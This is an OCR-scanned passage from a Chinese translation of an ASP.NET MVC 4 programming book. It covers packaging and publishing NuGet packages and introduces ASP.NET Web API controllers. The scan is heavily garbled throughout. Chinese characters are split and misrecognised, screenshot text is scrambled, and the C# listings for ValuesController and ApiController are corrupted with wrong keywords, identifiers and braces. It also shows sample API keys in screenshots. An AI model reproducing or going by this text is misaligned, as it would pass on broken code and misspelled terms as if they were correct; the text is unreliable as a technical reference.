了 三 种 可 能 的 答案 ， 但 是 函数 的 用 户 可 以 自由 地 提出 任何 问题 。 

e 最 后 一 行 代码 导出 Get-Answer 图 数 。 这 束 使 得 该 图 数 可 在 控制 台中 作为 一 个 公共 
命令 来 调用 。 

现在 需要 做 的 就 是 打包 这 些 文件 ， 并 安装 包 。 为 使 这 些 脚本 能 够 运行 ， 必 须 把 它们 放 

在 包 的 tools 文件 夹 中 。 如 果 把 这 些 文件 拖 到 包 浏 览 器 (Package Explorer) 的 Contents 窗 格 一 一 
后 面 第 10.5.3 节 将 讲 到 的 一 个 有 用 工具 , 系统 会 自动 地 提示 把 文件 放 在 tools 文件 夹 中 。 如 
果 正 在 使 用 NuGet.exe 创建 包 ， 需 要 把 这 些 文件 放 到 名 为 tools 的 文件 夹 中 。 

包 一 旦 创建 完成 ， 我 们 就 可 以 把 它 安 装 到 本 机 中 进行 测试 。 把 该 包 放 在 一 个 合适 的 文 

件 夹 中 , 并 将 该 文件 夹 作为 包 源 添加 到 供应 库 (feed) 中 。 包 安装 完毕 后 , 在 包 管 理 器 控制 台 ， 
可 以 使 用 一 个 带 有 选项 卡 扩展 的 新 命令 ， 如 图 10-18 所 示 。 


Package source | packages ~ 而， Default project MvcApplication 
PM> Get-Answer | 
Ts this my luclkey day? 
Wl i rain tonight? 
‘Dolwatch too much TVY 


10-18 
- 旦 掌握 了 PowerShell 的 技巧 ， 快 速 地 创建 能 够 回 包 管理 喜 探 制 台 添加 强大 新 命令 的 
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包 就 非常 容易 了 。 现 在 我 们 只 是 接触 了 其 功能 的 冰山 一 角 而 已 。 
10.4.8 ”框架 和 轮廓 定位 


许多 程序 集 都 是 基于 .NET Framework 的 某 一 个 具体 版 本 运行 的 。 例如， 可 能 有 一 个 库 
的 一 个 版 本 基于 的 平台 是 .NET 2.0， 而 该 库 的 男 一 个 版 本 利用 的 却 是 .NET 4.0。 因 此 ， 我们 
没 必 要 为 每 个 版 本 都 单独 地 创建 一 个 包 。 NuGet 支持 在 一 个 包 中 存放 同一 个 库 的 多 个 版 本 ， 
只 不 过 在 包 中 需要 用 不 同 的 文件 夹 存 放 这 些 不 同 的 版 本 。 

当 NuGet 安装 包 中 的 程序 集 时 , 它 会 检查 项 目 将 


a [BB MyPackage 


包 添 加 到 的 目标 NET Framework 版 本 。 然后 根据 项 日 4 攻 且 

的 .NET 版本， 选择 正确 的 程序 集 版 本 ， 也 即 在 lib 文 一 ~ 

件 夹 中 选择 正确 的 子 文件 夹 。 图 10-19 展示 了 一 个 基 er 

于 .NET 2.0 和 .NET 4 的 包 的 布局 示例 。 | i 
为 使 NuGet 能 为 基于 不 同 NET 平台 的 项 目 添加 10-19 


正确 的 程序 集 版 本 ， 我 们 使 用 下 面 的 命名 约定 来 为 不 
同 的 框架 版 本 指定 程序 集 版 本 : 


lib\{framework name} {versionl 


其 中 ，famework name 参数 值 只 有 两 种 选择 一 一 .NET Framework 和 Silverlight。 我 们 
习惯 于 使 用 这 两 种 框架 的 缩写 形式 一 一 net 和 sl。 

version 指 的 是 框架 的 版 本 。 为 简单 起 见 ， 可 省 略 点 字符 ， 因 此 ; 

e net20 对 应 于 .NET 2.0 

e net35 对 应 于 .NET 3.5 

e net40 对 应 于 .NET 4 

e net45 对 应 于 .NET 4.5 

e sl4 对 应 于 Silverlight 4.0 

那些 没有 相关 框架 名 称 和 版 本 的 程序 集 将 直接 存储 在 lib 文件 夹 中 。 

当 NuGet 安装 含有 多 个 程序 集 版 本 的 包 时 , 它 会 试图 使 程序 集 的 框架 名 称 和 版 本 与 项 
目的 目标 框架 和 版 本 相 匹 配 。 

如 果 找 不 到 精确 匹配 ,NuGet 将 继续 查找 lib 文件 夹 中 的 下 一 个 子 文 件 夹 ; 如 果 存 在 某 
个 文件 夹 的 框架 版 本 与 项 目 框 架 相 匹配 ,并 且 它 的 最 高 版 本 号 小 于 或 等 于 项 目 框 架 版 本 号 ， 
那么 NuGet 就 匹配 成 功 。 

例如 ， 我 们 在 .NET Framework 3.5 的 项 目 中 安装 一 个 拥有 lib 文件 夹 结 构 ( 如 图 10-19 
所 示 ) 的 包 ，NuGet 就 会 选择 名 为 net20(.NET Framework 2.0) 的 文件 来， 因为 它 的 最 高 版 本 
仍然 小 于 等 于 3.5。 


NuGet 通过 在 文件 夹 未 尾 处 追加 一 个 破 折 号 和 轮廓 名 称 ， 也 支持 定位 到 一 个 具体 的 杠 
架 轮 廊 : 


lib\{framework name} {versionl} 
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例如 , 为 了 定位 到 Windows Phone 轮廓 , 可 将 程序 集 放 在 一 个 名 为 sl4-wp 的 文件 夹 中 。 

NuGet 文 持 的 轮廓 包括 : 

se Client: Client 轮 廊 

e Full: Full 轮 亡 

® WP: Windows Phone 

在 所 写本 章 内 容 时 ， 要 想 定 位 到 Windows Phone 轮廓 ， 必 须 指定 Silverlight 4 框架 。 
预计 ， 在 未 来 将 在 手机 上 支持 更 高 版 本 的 Silverlight。 
10.4.9” 预 发 布 包 


默认 情况 下 ，NuGet 只 显示 “稳定 ” 包 。 然 而 ， 我 们 可 能 想 创 建 下 一 个 大 发 布 包 的 测 
试 版 本 ， 并 且 还 可 以 在 NuGet 上 找到 它 。 

NuGet 支持 预 发 布 包 的 概念 。 为 了 创建 预 发 布 版 本 ， 根 据 Semantic Versioning(SemVeD) 
说 明 指 定 一 个 预 发 布 版 本 号 。 例 如 ， 为 了 创建 1.0 包 的 版 本 号 ， 可 能 把 版 本 号 设置 为 
1.0.0-beta。 可 在 NuSpec 的 version 字段 中 设置 ， 也 可 以 通过 AssemblyInformationalVersion 
设置 (如 果 是 通过 项 目 来 创建 包 的 话 ): 


[assembly: AssemblyIinftormatijonalVersion("l1.0.1-alpha"™})]| 


如 果 需 要 更 多 的 了 解 版 本 号 和 SemVer， 请 参阅 NuGet 的 版 本 文档 ， 网 址 : 
http:/docs.nuget.org/docs/Reference/Verslonlng。 

预 发 布 包 可 以 依赖 于 稳定 包 ， 但 稳定 包 不 能 依赖 于 预 发 布 包 。 这 样 做 的 原因 是 ， 当 有 
人 安装 稳定 包 时 ， 他 (或 她 ) 不 想 承 担 预 发 布 包 的 额外 风险 。NuGet 让 我 们 选择 是 否 加 入 预 
发 布 包 和 它 所 固有 的 风险 。 

为 了 能 在 Manage NuGet Packages 对 话 框 中 安装 预 发 布 包 ， 我 们 需要 确保 选择 中 间 面 
板 下 拉 杠 中 的 Include Prerelease， 而 不 是 Stable Only。 在 Package Manager Console 中 ， 可 
在 Install-Package 命令 中 使 用 -IncludePrerelease。 


10.5 发布 包 


上 一 节 介 绍 了 创建 包 的 方法 。 尽 管 创 建 包 的 方法 很 有 用 ， 但 有 时 ， 我 们 更 需要 学 会 与 
世界 分 享 自己 的 成 果 。 如 果 不 介 意 共享 成 果 的 话 ， 带 有 私有 供应 库 的 NuGet 可 帮助 我 们 实 
现 共享 。 这 些 将 在 稍 后 进行 介绍 。 

10.5.1 发 布 到 NuGet.org 

默认 情况 下 ，NuGet 指 加 一 个 网 址 为 https://nuget.org/apiv2/. 的 供应 库 。 

可 按照 以 下 步骤 ， 将 创建 的 包 发 布 到 供应 库 : 

(1) 在 http://nuget.org/ 站 点 上 创建 一 个 NuGet Gallery 账户 。 图 10-20 展示 的 是 Nuget 
gallery 的 首页 。 
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(2) 登录 站 点 ， 然 后 单 击 用 户 名 。 进 入 一 个 新 页 面 ， 这 里 可 以 管理 账户 和 包 。 单 击 Upload 
Package 链接 ， 可 以 导航 到 上 传 页 面 ， 如 图 10-21 所 示 。 


um 万- 恒 -一 一 一 一 


一 一 -ae 


Upload Your Package 
Er 


Your package fie will be uploaded and hosted on the Nubet Gallery server (NuGet.org) 


Upload 


Overview Install Videos FA 所 

MiGet m a Vi Stodia 2010 NuGet Can be Irmlalied nd WW th ETE fnd ed tive FT Miiced 
Eb ht rds dt tay 6 pted Lriang he Wi Breiennaiony Mbout rthinga Queiterns loul MuGet nd 
ddd, remeve, nd Update Stdio Etennion Menager. Te rd everythirg Nutdet We 证 pear eton mlde We 
Iboriries rd Chek Hf your Cop bint 


WV Dr orien, 


本 
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单 击 Upload 按钮 ， 可 跳 转 到 另 一 个 页 面 ， 我 们 可 以 在 新 页 面 上 核对 包 的 元 数据 ， 如 
10-22 所 示 。 如 条 想 上 传 包 , 并 币 望 上 传 的 包 在 搜索 结果 中 隐藏 , 那么 只 需要 取消 选择 "List 
this package in search results” 选 项 即 可 。 这 里 再 要 注意 ， 如 果 知 道 隐藏 包 的 ID 和 版 本 ,我 
们 仍 能 安装 隐藏 包 。 这 一 点 在 包 对 外 公布 之 前 测试 中 非常 有 用 。 


gallery 


Packages Upload Package 


Verlfy Details 


These package details are read from the package File and cannot be changed. i amythang below is meorrect click Cancel and upload a Comect packige, 


Packace ID 
Msict atedonzer 
Version 


100 


J TF pi 站 站 


Categorizes music nto genres as well as aulomatically determines beats per minute (BPN) of 3 song. 


Authnor 
Haacked 


Submit Package 


(3) 核对 完 元 数据 后 ， 单 击 Submit 按钮 。 这 样 就 会 上 传 包 ， 并 把 页 面 重 定向 到 包 详 细 
信息 的 页 面 。 
10.5.2 使 用 NuGet.exe 

NuGet.exe 可 用 来 创建 包 ， 如 果 它 还 可 以 用 来 发 布 包 ， 岂 不 是 更 好 ? 值得 庆 羊 的 是 ， 
使 用 NuGet 的 NuGet push 命令 可 帮助 我 们 完成 这 个 任务 ， 但 是 在 运行 命令 以 前 要 有 API 

在 NuGet 网 站 上 ， 单 击 用 户 名 导航 到 账户 页 面 。 上 面 的 页 面 可 以 用 来 管理 账户 ， 但 更 
重要 的 是 ， 它 显示 出 了 访问 密 钥 ， 在 使 用 NuGet.exe 发 布 包 时 这 是 必需 的 。 只 需 向 下 滚动 
一 点 ， 单 击 赣 色 区 域 来 获取 API 密 铀 ， 如 图 10-23 所 示 。 

为 方便 起 见 , 该 页 面 上 还 提供 了 一 个 Generate New API Key 按钮 ， 以 防 在 密 钥 泄露 时 ， 
重新 生成 新 的 API 密 钥 ， 正 如 图 10-23 中 所 示 。 
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由 于 每 次 使 用 NuGet push 命令 时 都 需要 输入 API 密 钥 ， 这 样 很 不 方便 。 然而 ， 可 以 使 
用 NuGet 的 SetApiKey 命令 存储 API 密 铀 ， 以 便 下 次 再 使 用 push 命令 时 ， 不 需要 重新 输 
入 API 密 钥 。 图 10-24 展示 了 SetApiKey 命令 的 用 法 。 


CWindows\system32\cmd.exe 


Ithe API Key 'dc9bf8da-c367-4f92-8557-lecc8696c5b0" was saved 
for the NuGet gallery 人 the symbol 
Eerver (http://nuget ,gw.symbolscource.orgApu511c/ANuGet,) ， 


EC:\dev> 
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API 密 钥 保存 到 漫游 配置 文件 (Roaming profile) 中 的 NuGet.config 文件 中 。 例 如 ， 在 笔者 
Windows 7 计算 机 上 ， 它 的 存储 位 置 是 Ci\Users\Haacked\AppData\Roamine\NuGet\NuGet.config。 

如 图 10-25 所 示 ， 保存 API 密 钥 后 ， 发 布 一 条 命令 就 变 得 非常 容易 ， 只 再 运行 push 命 
令 ， 并 指定 想 要 上 发布 的 .nupkg 文件 即 可 。 

这 样 可 以 使 包 在 供应 库 中 立即 可 用 , 因此 , 其 他 人 可 以 通过 对 话 框 或 控制 台 下 载 安装 。 
请 注意 ，nuget.org 站 点 表现 出 这 一 变化 ， 可 能 需要 花费 几 分 钟 时 间 。 
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画 cwindowsoyztemazemdee 


C:\dev>nuget push MusTCCategor1Zer , 工 2.0,.mu 
| pushing poe 1.2.0 to the NuGet ry (https:/ 
| mw. nuget :org 

Your package Was pushed. 


:"\dev> 


10-25 
10.5.3 包 浏 览 器 的 用 法 


包 创 建 完毕 后 , 我 们 还 要 对 其 进行 检查 ,以 确保 它 被 合适 地 打包 。 本 质 上 , 所 有 NuGet 
包 只 是 zip 格式 的 压缩 文件 。 我 们 可 以 重 命 名 该 文件 ， 使 其 有 一 个 .zip 文件 扩展 名 , 然后 进 
行 解压 缩 操 作 ， 并 得 看 其 中 的 内 容 。 

除了 上 面 得 看 包 内 容 的 方法 之 外 ， 还 有 一 种 更 向 便 的 方法 : 使 用 包 浏 览 费 (Package 
Explorer)。 这 是 一 个 ClickOnce 应 用 程序 ， 可 在 NuGet 的 CodePlex 发 布 页 面 下 载 ， 网 址 为 
http://nuget.codeplex.com/releases。 

安装 好 包 浏 览 右 后 ， 可 以 双击 任何 .nupkg 文件 来 查看 其 中 的 内 容 ， 如 图 10-26 所 示 。 


| 夯 NuGet Package Explorer - MusicCategorizer-L00 Ep yr 
iI| EE EU VEW CONTENT TOOLS HELP | 
| Peck [hm i PEEks 二 CO | 
Er 
Da ld Musict ategqgonser 
| 目 Wersion 100 
Authors Hasckbeat Enterprnses 
Tage: Musie Fake 
Requires License Acceptlance: Ho 
Description: 


SR tegornzer,dil 


Me Categqonzes music nte genres 83 well ss automatically 
| RR a oh 
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此 外 ， 包 浏览 如 还 可 以 用 来 快速 编辑 包 文 件 ， 甚 至 可 以 用 来 创建 一 个 全 新 的 包 。 例如 ， 
单 击 Edit 沫 单 并 选择 Edit Package Metadata 沫 单项 以 使 元 数据 处 于 可 编辑 状态 ,如 图 10-27 
所 示 。 

可 将 文件 拖 到 Package contents 窗 格 中 的 合适 文件 夹 中 。 若 把 一 个 文件 拖 放 到 Package 
contents 窗 格 中 ， 但 没有 为 其 指定 任何 文件 夹 ， 此 时 包 浏 览 器 会 根据 文件 的 内 容 同 用 户 推 
荐 一 个 文件 夹 。 例 如 ， 它 会 推荐 把 程序 集 放 入 lib 文件 夹 ， 把 PowerShell 脚本 放 入 Tools 
文件 夹 。 
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大 NUGet Package Eplorer -kuSiCCategGrizerL 履 站 
FRE ED MEW CONTENT TOQS Hap 


i Bb 
Mus tC stegernzar. dl 
hunt teqonser 
i100 


Haackbeat Enterpases 
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完成 对 包 的 编辑 之 后 ， 选 择 File | Save 菜单 选项 或 使 用 Ctrlts 组 合 键 来 保存 编辑 完成 
的 .nupksg 文件 。 

包 浏 览 器 也 提供 了 发 布 包 的 一 种 便捷 方式 ， 即 通过 选择 File | Publish 菜单 ， 打 开发 布 
对 话 框 ， 如 图 10-28 所 示 。 只 需 输入 API 密 钥 ， 单 击 Publish 按钮 ， 就 可 以 轻松 快速 地 将 包 
发 布 到 供应 库 中 。 


Publish Package 


Enter your publish key. 
| ] Provide the publish Url snd the publish key sssociated with 全 
|| 刘 MusicCategorizer Versen: 1.0.0 


Nl Publish Ur https//nuget.org 


Publish key: 9a9f7ed4d-53cb-8211-4387-bc35a21d82 市 


| Use the vl protoesl for this urt. 


10.6 小结 


虽然 NuGet 作为 ASPNET MVC 4 的 完美 补充 ， 与 ASPNET MVC 4 一 起 发 布 ， 但 它 
却 不 局 限于 ASPNET MVC 项 目 。NuGet 儿 乎 可 以 用 来 为 Visual Studio 中 所 有 类 型 的 项 目 
安装 包 。 比 如 构建 Windows Phone 应 用 程序 时 ， 就 有 相应 的 一 组 NuGet 包 。 

但 当 创 建 ASPNET MVC 4 应 用 程序 时 ，NuGet 绝对 是 一 个 强大 的 助手 。 它 可 为 我 们 
下 载 安装 许多 利用 了 ASPNET MVC 的 特定 内 置 特性 的 包 。 

例如 ， 可 以 安装 Autofac.Mvc4 包 ， 该 包 可 以 作为 依赖 解析 器 上 自动 连接 Autofac 依赖 注 
入 库 ， 安 装 MvcScaffolding 包 可 以 癌 Add Controller 对 话 框 中 添加 新 的 基 架 模板 。 

当 准 备 与 世界 分 享 自己 的 库 时 ， 不 要 仅 把 它们 压缩 成 zip 文件 ， 放 在 网 络 上 ， 而 应 把 
它们 转换 成 NuGet 包 ， 以 便 与 他 人 共享 。 
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ASP.NET Web API 


本 章 主要 内 容 

e 定义 ASPNET Web API 

e Web API 入 门 

e 编写 API 控制 器 

es 了 虑 首 Web API 

e Web API 和 MVC 路 由 对 比 

e 参数 绑 定 

e 过 小 请 求 

e 启用 依赖 注入 

e 探索 API 编程 

e 跟踪 应 用 程序 

Web API 项 目 是 Windows 通信 接口 (Windows Communication Foundation, WCF) 团 队 及 
其 用 户 激 情 的 产物 ， 他 们 想 与 HTTP 深度 整合 。 先 前 使 用 WCF 进行 Web 服务 编程 的 迭代 
是 一 个 抽象 事务 ， 主 要 为 了 隐藏 像 传 输 细 节 一 样 的 内 容 。Web API 视图 彻底 颠 禾 这 一 过 程 ， 
去 掉 WCF 中 的 大 部 分 层 ， 而 允许 开发 人 员 直 接 访 问 HITP 编程 模型 的 所 有 方面 。 新 框架 
在 开放 的 、 能 够 不 断 预览 版 本 的 开发 环境 中 开发 ， 并 由 Henrik Frystyk Nielsen(Web API 团 
队 设 计 师 和 原 有 HTTP 规范 制作 者 之 一 ) 监 督 , 它 为 那些 只 想 使 用 HTTP 或 完全 控制 的 WCF 
用 户 提供 了 一 种 真正 的 可 选 方案 。 

经 历 2011 年 团队 的 重组 之 后 ， 出 现 了 ASPNET MVC 团队 和 WCF Web API 团队 ， 都 
由 Scott Guthrie 领导 ,Scott Guthrie 想 合并 两 个 团队 的 工作 , 以 便 开发 人 员 能 够 很 轻松 地 从 
他 们 的 ASPNET 知识 过 渡 到 编写 Web API。 团 队 开始 努力 合并 两 个 平台 的 优点 ， 最 终 诞生 
了 ASPNET Web API， 并 随 ASPNET MVC 4 一 同 发 布 。 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 
11.1 定义 ASP.NET Web API 


如 果 说 在 当今 数字 通信 和 领域 有 一 个 共同 点 ， 那 么 它 一 定 是 流行 的 HITP。 我 们 不 仅 有 
已 经 使 用 超过 20 年 的 浏览 器 ， 我 们 许多 人 每 天 口袋 里 还 逆 有 具有 很 强 计 算 能 力 的 智能 手 
机 。 应 用 程序 频繁 地 使 用 HITP 和 JSON 作为 通信 渠道 访问 主页 。 当 今 的 应 用 程序 如 果 不 
能 提供 某 种 形式 的 远程 访问 API， 就 不 能 认为 它 已 经 “完成 ”% 

当 MVC 开发 人 员 请 求 给 他 们 一 些 建 议 时 ， 笔 者 通常 会 说 :“ASPNET MVC 在 接收 表 
单数 据 生 成 HTML 方面 功能 非常 强大 ASPNET Web API 在 接收 和 生成 像 JSON 和 XML 
等 结构 化 数据 方面 功能 非常 强大 。” 虽 然 MVC 使 用 JsonResult 和 JSON 值 提供 器 提供 了 结 
构 化 的 数据 支持 ， 但 在 某 些 API 重要 应 用 方面 ， 它 仍 存 在 不 足 之 处 ， 其 中 包括 以 下 方面 : 

e 基于 HTTP 动词 而 不 是 操作 名 称 调度 操作 

e 接收 和 生成 那些 面向 对 象 不 必要 的 内 容 ， 不 仅 是 XML， 还 有 像 图 片 、PDF 文件 或 

VCARD 这 样 的 内 容 
e 内 容 类 型 协商 ， 它 支持 开发 人 员 接 收 和 生成 结构 化 内 容 ， 而 独立 于 内 容 的 线 表 示 
(Wire representation) 

e 在 ASP.NET 运行 时 堆栈 和 IIS Web 服务 器 以 外 托管 ，WCF 一 直 做 了 很 多 年 

Web API 的 一 个 重要 部 分 是 ，API 团队 费 尽 周折 地 尝试 ， 以 便 我 们 能 够 充分 利用 已 有 
的 ASPNET MVC 经 验 ， 比 如 控制 器 、 操 作 、 过 滤器 、 模 型 绑 定 器 和 依赖 注入 等 。 因 此 ， 
这 些 相同 的 概念 大 多 以 相似 形式 出 现在 Web API 中 ， 这 使 得 结合 MVC 和 Web API 的 应 用 
程序 看 起 来 能 够 完美 地 整合 。 

由 于 ASPNET Web API 是 一 个 全 新 框架 ， 因 此 它 可 能 有 一 系列 保证 。 本 章 内 容 应 该 介 
绍 MVC 和 Web API 之 间 的 异同 ， 帮 助 我 们 决定 是 否 在 MVC 项 目 中 使 用 Web API。 


11.2 Web API 入 | 


ASPNET MVC 4 作为 Visual Studio 2012 的 一 部 分 发 布 , 同时 也 作为 Visual Studio 2010 
SP1 的 附件 内 容 发 布 。 安 装 程序 包含 所 有 ASPNET Web API 组 件 。 

所 有 MVC 项 目 模板 都 为 支持 MVC 和 Web API 代码 而 包含 必要 的 二 进 制 文件 和 配置 ; 
它们 与 默认 放 入 项 目的 示例 文件 不 同 。 标 签 为 Web API 的 模板 ， 如 图 11-1 所 示 ， 是 唯一 一 
个 包含 示例 API 控制 器 的 模板 。 通过 Visual Studio 中 的 File[New Item 菜单 和 解决 方案 浏览 
右 (Solution Explorer) 中 的 AddlController 上 下 文 沫 单 ， 都 可 以 把 MVC 和 Web API 这 两 类 控 
制 器 添加 到 已 有 项 目 中 。 这 包括 为 所 有 读 写 操作 使 用 Entity Framework 数据 库 访 问 代码 生 
成 控制 器 。 
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| New ASP.NET MVC 4 Project 


Project Template 
select a template: Descnption: 

: ; SP.NET Web API Project. 
| 到 | 天 5 C An ASP.N | 
e ej ej] ej 
Empty Basic Internet Intranet 

Application Application 
ee Ee 
e § 
Mobile Web APl 
Application 


View engine: 


[Razor 于 


[| Create a unit test project 
Test project name: 
MvcApplicationl ,Tests 

Test framewortk: 


Visual Studlo Unit Test Addrtional Info 


| OK | | Cancel ] 


11.3 ”编写 API 控制 器 


Web API 与 MVC 一 同 发 布 ， 二 者 都 利用 了 控制 占 。 然 而 ，Web API 不 共享 MVC 的 模 
型 -视图 -控制 器 设计 模式 。 它 们 都 拥有 将 HTTP 请 求 映射 成 控制 器 操作 的 概念 ， 但 不 是 使 
用 输出 模板 和 视图 引擎 演 染 结果 的 MVC 模式 ，Web API 直接 把 结果 模型 对 象 作 为 响应 来 
泻 染 。Web API 和 MVC 的 许多 设计 区 别 都 源 于 二 者 框架 核心 的 差异 。 本 节 介 绍 编写 Web 
API 控制 融和 操作 的 基础 内 容 。 
11.3.1 检查 示例 ValuesController 


程序 清单 11-1 包含 当 我 们 使 用 Web API 项 目 模板 创建 项 目 时 得 到 的 ValuesController 


类 。 我 们 注意 到 第 一 个 区 别 是 ， 存 在 一 个 所 有 API 控制 右 都 使 用 的 基 关 : ApiController。 


程序 清单 11-1: ValuesController 


USing System; 
usSing System.Collections.Generic; 
Using System.Lindg; 
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USlIng System.Nets; 
Uslng System.Net.Http; 
Uslng SYystem.Web.Http; 


namespace WebApiSample.Controllers 
{ 
public class ValuesController : ApiController | 
// GET api/values 
public IEnumerable<string> Get() 1 
return new string[|] 1{ "valuel", "value2™ |]}; 


} 


// GET api/values/5 
public string Get(int 1id) { 
return "value"™; 


} 


// POST api/values 
public void Post([FromBody|] string value) 1| 
} 


// PUT api/values/5 
public void Put(Int id, [FromBody| string value) | 
} 


// DELETE api/values/5 
public void Deletel(int 3d) { 
} 
} 
我 们 注意 到 的 第 二 个 区 别 是 ， 探 制 右 中 的 方法 返回 原始 对 象 ， 而 不 是 视图 ， 也 不 是 其 
他 操作 辅助 对 象 。 不 返回 由 HTML 组 成 的 视图 ，API 控制 右 返 回 的 对 象 被 转换 成 请 求 要 求 
的 最 佳 匹配 格式 ， 后 面 将 介绍 这 一 过 程 的 原理 。 
第 三 个 差异 主要 源 于 MVC 和 Web API 传统 调度 之 间 的 差异 .MVC 控制 器 总 是 根据 名 
称 调度 操作 ，Web API 控制 器 默认 根据 HTTP 动词 调度 操作 。 虽 然 可 以 使 用 动词 重 写 特性 ， 
比如 [HttpGet 或 [HttpPostl， 但 大 部 分 基于 动词 的 操作 可 能 遵照 操作 名 称 以 动词 名 称 开 头 的 
模式 。 示 例 控制 器 中 的 操作 方法 直接 以 动词 命名 ， 但 也 有 操作 方法 以 动词 名 称 开 头 ， 也 就 
是 说 ，Get 动词 既 能 访问 Get 操作 ， 也 能 访问 GetValues 操作 。 
注意 ApiController 在 名 称 空间 System.Web.Http 中 定义 ， 而 不 是 定义 在 名 称 空间 
System.Web.Mvc 中 ， 但 是 Controller 定义 在 System.Web.Mvc 名 称 空 间 中 。 至 于 为 什么 这 
样 ， 当 我 们 学 习 自 托管 后 ， 目 然 会 清楚 其 中 的 原因 。 
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注意 .NET 4.5 中 引入 的 System.NetHttp 库 是 一 个 极其 轻便 的 、 类 型 安 
全 的 封装 库 ， 它 主要 针对 HTTP 客户 端 和 HTTP 服务 器 应 用 程序 。Web API 
团队 之 所 以 选用 这 个 新 抽象 来 代表 请 求 和 响应 ,主要 是 因为 它 不 直接 连接 到 底 
层 主机 ， 不 论 是 ASPNET 还 是 WCF， 都 有 两 个 为 Web API 内 置 的 主机 。 

如 果 MVC 4 和 Web API 只 要 求 .NET 4， 那 么 我 们 如 何 使 用 NET 4.5 的 
System.Net.Http 库 呢 ? Web API 团队 获得 许可 ， 可 以 把 新 库 移 植 到 与 NET 4 
兼容 的 形式 ; 与 MVC 4 一 起 ， 新 库 在 NuGet 上 发 布 了 一 个 二 进 制 副本 ， 以 便 
Web API 应 用 程序 可 在 .NET 4 平台 上 使 用 它 ，。 

在 本 章 后 面 介绍 实现 差异 和 自 托 管 课题 时 ， 将 详细 介绍 System.Net.Http 库 。 


11.3.2 ”异步 设计 : IHttpController 


程序 清单 11-2 展示 了 ApiController 接口 。 如 果 与 MVC 的 Controller 类 对 比 ， 我 们 会 
发 现 其 中 的 一 些 概念 是 相同 的 ， 比 如 控制 器 上 下 文 、Modelstate、Url 辅助 方法 和 User， 
些 概念 相似 却 存 在 差异 ， 比 如 Request 是 来 自 System.Net.Http 的 HttpRequestMessage 而 不 
是 来 目 System.Web 的 HttpRequestBase， 一 些 概念 是 缺失 的 ， 比 如 最 显著 的 Response 和 
ActionResult- 生 成 方法 。 


程序 清单 11-2: ApiController 公共 接口 


namespace System.Web.Http 1 
public abstract class ApiController : IHttpController, IDisposable | 
public HttpConfiguration Configuration { get; set; } 
public HttpControllerContext ControllercContext { get; set; |} 
public ModelstateDictionary Modelstate 1{ get; |} 
Public HttpRequestMessage Request 1{ get; set; |} 
Public UrlHelper Url 1{ gqet; set; } 
Public IPrincipal User 1{ get; } 


public virtual Task<HttpResponseMessage> ExecuteAsync( 
HttpControllercontext controllerContext, 


CancellationToken cancellationToken).; 


protected virtual woid Initializel 
HttpControllerContext controllerContext); 


} 


ApiController 上 的 ExecuteAsync 方法 是 接口 IHttpController 中 的 方法 ， 顾 名 思 义 ， 它 
意味 看 所 有 Web API 控制 右 都 是 异步 设计 。 当 使 用 Web API 时 ， 没 必要 为 异步 和 同步 操作 
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添加 分 割 类 。 显 而 易 见 ， 这 里 的 管道 不 同 于 ASPNET， 因 为 不 能 访问 Response 对 象 ，API 
控制 器 期 望 返回 一 个 HttpResponseMessage 类 型 的 啊 应 对 象 。 

HttpRequestMessage 和 HttpResponseMessage 类 构成 了 System.Net.Http 中 HITP 文 持 
的 基础 。 这 些 类 的 设计 不 同 于 ASPNET 的 核心 运行 时 类 ， 在 这 个 栈 的 处 理 方法 中 , 给 定 一 
个 请 求 消息 ， 期 望 返回 一 个 响应 消息 。 不 像 在 ASPNET 中 ，System .Net.Http 类 没有 静态 方 
法 访问 持续 请 求 的 信息 。 这 也 意味 着 ， 不 必 直 接 写 入 响应 流 ， 开 发 人 员 可 以 返回 一 个 描述 
啊 应 的 对 象 ， 然 后 在 需要 时 渔 染 。 


11.3.3” 传 入 的 操作 参数 


为 从 请 求 中 接收 传 入 的 值 ， 可 在 操作 上 放置 参数 ， 就 像 在 MVC 中 一 样 ，Web API 框 
架 会 自动 为 这 些 操作 方法 提供 参数 值 。 和 MVC 不 同 的 是 ， 从 HTTP 主体 获取 的 值 和 从 其 
他 地 方 ( 比 如 URD 获 取 的 值 之 间 有 一 条 强 线 (strong line)。 

默认 情况 下 ，Web API 会 假设 简单 类 型 (也 就 是 内 部 类 型 ， 如 字符 串 、 日期、 时 间 和 种 
有 一 个 字符 串 类 型 转换 器 的 类 型 ) 的 参数 是 非 主体 值 ， 而 复合 类 型 从 主体 获取 。 此 外 ,还 有 

-个 额外 的 限制 ， 只 有 一 个 值 可 以 来 自主 体 ， 并 且 这 个 值 必须 代表 整个 主体 。 

如 条 传 入 参数 不 是 主体 的 一 部 分 ， 就 会 由 模型 绑 定 系统 处 理 ， 这 里 的 模型 绑 定 系 统 与 
MVC 中 的 相似 。 从 另 一 方面 说 ， 传 入 和 输出 的 主体 会 被 一 个 称 为 “格式 器 ”的 全 新 概念 
处 理 。 本 章 后 面 会 详细 介绍 模型 绑 定 和 格式 器 。 

11.3.4 ”操作 返回 值 、 错 误 和 异步 

Web API 控制 右 以 操作 人 返回 值 的 方式 把 值 发 送 回 客户 端 。 可 通过 ExecuteAsync 的 签名 
猜测 ，Web API 中 的 操作 可 以 返回 HttpResponseMessage 来 作为 发 送 回 客户 端的 啊 应 。 从 革 
些 方面 来 说 ， 这 类 似 于 MVC 中 ActionResult 的 返回 类 型 。 然 而 ， 返 回响 应 对 象 是 一 个 相 
当 低级 的 操作 ， 所 以 Web API 控制 器 几乎 总 是 返回 一 个 原始 对 象 值 或 值 序 列 。 

当 操作 返回 一 个 原始 对 象 时 ，Web API 使 用 称 为 内 容 协商 (Content Negotiation) 的 功能 
把 它 自 动 转换 成 一 个 符合 要 求 的 结构 化 响应 ， 比 如 JSON 或 XML。 正 如 前 面 提 到 的 ， 用 来 
转换 的 扩展 格式 机 制 会 在 本 章 后 面 进行 介绍 。 

返回 原始 对 象 的 能 力 是 非常 强大 的 ， 但 在 从 ActionResult 转换 过 程 中 ， 我 们 也 会 丢掉 

- 些 东西 ;也 就 是 说 ， 为 成 功 和 失败 返回 不 同 值 的 能 力 。 当 操作 签名 强 连 接 到 我 们 想 成 功 
使 用 的 返回 值 类 型 时 ， 如 何 轻 松 地 支持 返回 一 些 错误 的 不 同 表 示 呢 ? 如 果 我 们 把 操作 签名 
修改 为 HttpResponseMessage， 这 样 会 使 控制 器 操作 和 单元 测试 变 得 复杂 。 

为 解决 这 个 问题 ，Web API 人 允许 开发 人 员 从 操作 中 抛 出 HttpResponseException， 从 而 
表示 返回 的 是 HttpResponseMessage 而 不 是 成 功 的 对 象 数 据 。 这 样 一 来 ， 存 在 错误 的 操作 
